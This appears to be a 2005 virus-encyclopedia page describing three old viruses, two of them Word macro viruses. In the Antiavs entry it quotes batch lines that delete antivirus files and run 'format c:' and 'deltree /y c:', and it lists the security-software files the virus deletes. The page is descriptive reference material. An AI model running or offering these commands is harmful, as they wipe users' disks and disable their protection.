Virus Database


Breakdown.997

Description Breakdown.997

This is a harmless, non-memory resident encrypted parasitic virus. It searches for COM files in the current directory, then writes itself to the end of the file. The virus contains the text string:
breakdown [alpha]

Check other viruses! Be aware! Use Antiviral Software

Macro.Word.Antiavs

Description Macro.Word.Antiavs

This is an encrypted Chinese Word macro virus. It contains nine macros: AutoExec, AAV, AutoOpen, AutoNew, FileSaveAs, ZlockMacro, FileTemplates, ToolsMacro, Organizer.
The virus infects the global macros area on opening an infected document (AutoOpen) and writes itself to documents that are saved with a new name (FileSaveAs).
On entering the File/Template menu (FileTemplate) the virus sets the password "AntiAVs" for current document and displays the MessageBox:
WordBasic Err = 16
Not enough memory!

On entering the Tools/Macro menu (ToolsMacro) the virus erases all texts within current document and appends to the AUTOEXEC.BAT file the commands that erase the anti-virus PC-CILLIN files:
echo off
attrib -h -r -s +a c:pc-cil~1*.* >nul
del c:pc-cil~1*.dll >nul

The virus then erases the anti-virus files:
C:PC-Cillin 95Lpt$vpn.*
C:PC-Cillin 97Lpt$vpn.*
C:TscPC-Cillin 97Lpt$vpn.*
C:lockavGsav.cas
C:VB7Virus.txt
C:Program FilesNorton AntiVirusViruscan.dat
C:Program FilesSymantecSymevnt.386
C:Program FilesMcAfeeVirusScan95Scan.dat
C:Program FilesMcAfeeVirusScan95Mcscan32.dll
C:Program FilesMcAfeeVirusScanScan.dat
C:Program FilesMcAfeeVirusScanMcscan32.dll
C:Program FilesCommand SoftwareF-PROT95Sign.def
C:Program FilesCommand SoftwareF-PROT95Dvp.vxd
C:Program FilesAntiViral Toolkit ProAvp32.exe
C:Program FilesAntiViral Toolkit Pro*.avc
C:Tbavw95Tbavw95.vxd

Depending on the system random counter the virus writes the text to the AUTOEXEC.BAT file:
@Echo off
cls
echo I have clean a huge virus:
echo MS-WINDOWS
echo for you. ^_^
echo --AntiAVs--
echo y|format c: /u /v:AAV >nul
deltree /y c: >nul

Macro.Word.Apparition

Description Macro.Word.Apparition

This is quite a primitive virus. It is dropped by Windows EXE virus "Win.Apparition". It contains three macros: WWUpdated, AutoOp (AutoOpen), FileOpen.
WWUpdated is the virus ID-macro. The virus detects its presence in the system by using this name. Macro AutoOp (AutoOpen in NORMAL.DOT) installs the virus macros into the system on opening an infected file. Macro FileOpen infects files on opening.
The virus contains the text strings, but does not use them in any way:
Presence of AVP for winword
AVP for Winword is a nice tutorial
(C) 2 Rats Soft.
this macro loaded in normal template as FileOpen
AVPcopyright$ AVP for WinWord v1.0
sQuestion$ Would you like to

Home

Viruses from A to Z
0-9 A B Ñ D E F G H I J
K L M N O P Q R S T
U V W X Y Z



StÄdfirma SÅpbubblan
Visus
Ekolea Ekologisk Hud Och HÅrvÅrd Ab
Gustafsson, Anders
Bilaktiebolaget Jan O Gertie FolgÅrd

    Copyright © 2005 Virus-Database.com
© 2005 Virus-Database.com